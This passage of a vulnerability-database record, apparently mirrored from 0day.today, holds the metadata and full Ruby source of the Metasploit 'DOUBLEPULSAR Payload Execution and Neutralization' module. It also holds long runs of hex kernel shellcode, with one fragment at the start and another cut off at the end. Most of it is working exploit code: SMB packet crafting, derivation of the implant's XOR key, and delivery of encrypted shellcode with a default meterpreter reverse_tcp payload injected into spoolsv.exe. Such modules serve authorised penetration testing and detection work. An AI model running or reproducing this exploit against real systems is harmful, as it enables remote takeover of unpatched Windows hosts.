\"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-16] #"}, "lastseen": "2021-10-15T22:18:06", "differentElements": ["sourceData"], "edition": 46}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "e17b1ad1afa525844612d4d51a95679d", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-10-16T22:17:06", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-15T22:18:06", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-15T22:18:06", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n 